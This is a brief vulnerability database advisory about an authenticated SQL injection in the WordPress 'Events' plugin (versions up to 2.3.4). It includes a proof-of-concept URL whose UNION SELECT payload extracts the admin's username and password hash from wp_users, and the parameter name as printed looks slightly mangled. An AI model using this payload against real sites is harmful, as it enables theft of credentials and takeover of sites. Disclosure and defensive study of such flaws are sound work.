Events <= 2.3.4 - Authenticated SQL Injection

2017-11-12T00:00:00
ID WPVDB-ID:8954
Type wpvulndb
Reporter Lenon Leite
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - Events <= 2.3.4 - Authenticated SQL Injection

PoC

target.dev/wp-admin/admin.php?page=wp-events-edit&edit;_event=2+UNION+SELECT+1,CONCAT(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14+FROM+wp_users+WHERE+ID=1